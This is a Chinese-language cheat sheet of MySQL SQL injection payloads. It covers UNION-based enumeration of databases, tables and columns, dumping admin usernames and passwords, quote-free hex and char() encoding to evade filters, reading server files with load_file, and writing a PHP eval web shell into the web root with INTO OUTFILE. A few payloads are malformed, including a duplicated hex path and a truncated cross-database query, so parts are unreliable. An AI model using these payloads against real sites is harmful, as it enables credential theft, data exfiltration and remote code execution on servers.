MySQL注入总结
常用词汇
-
information_schema
-
information_schema.schemata 查库名 [[注入函数#系统信息函数]]
-
information_schema.tables 查表名
-
table_schema 指定表的数据库
-
table_name 表名
-
column_name 列名
变量形式
table_schema 的取值形式: database()、[[hex编码]]、[[char()]]
不用单引号:
select ‘root’(英文形式的单引号)
select char(114,111,111,116) #待处理标签缺少易转化工具
select 0x726F6F74 #小技巧去掉0x需要加上单引号引住 hex() ,unhex()
注入语句
联合查询
-
查询列数
id=1 order by 3
-
查看回显位
id=-1 union select 1,2,3
-
查询变量信息
id=-1 union select 1,database(),3
-
查询所有数据库
select group_concat(schema_name),2,3 from information_schema.schemata
-
查询指定数据库的所有表名[[#变量形式]]
select group_concat(table_name ),2,3 from information_schema.tables where table_schema=database()
select group_concat(table_name),2,3 from information_schema.tables where table_schema=0x6462746F70676C6F7269613539
-
查询指定数据库的表读取列名[[#变量形式]]
select group_concat(column_name),2,3 from information_schema.columns where table_name=char(108, 107, 95, 97 ,100, 109, 105, 110, 95, 117, 115, 101, 114) and table_schema=0x6462746F70676C6F7269613539
-
查询指定数据库的表和列,读取列的值
select user_name,password,3 from lk_admin_user limit 1,2
-
读文件
select 1,load_file(0x2F7661722F7777772F68746D6C2F646174612F64617461746573742E7068700x2F7661722F7777772F68746D6C2F646174612F64617461746573742E706870),3
-
写文件
select 1,’<?php @eval($\_POST\['Bloo166'\]) ?>’,3 into outfile ‘C://www//function//2.php’;
跨库查询(一般需要 root 权限): 从 web 数据库的 user 表读取 pass 值
SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name=chr(117,115,101,114) and table_schema=0x776562
SELECT 1,2,group_concat (pass) from user where web
MySQL 5.7 新增了 sys 公共库,因此在 information_schema 被过滤之后,仍可通过 sys 库中的一些表来查询库名和表名
SELECT table_schema FROM sys.schema_table_statistics GROUP BY table_schema;
SELECT table_schema FROM sys.x$schema_flattened_keys GROUP BY table_schema;
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema=‘test’ GROUP BY table_name;
SELECT table_name FROM sys.x$schema_flattened_keys WHERE table_schema=‘test’ GROUP BY table_name;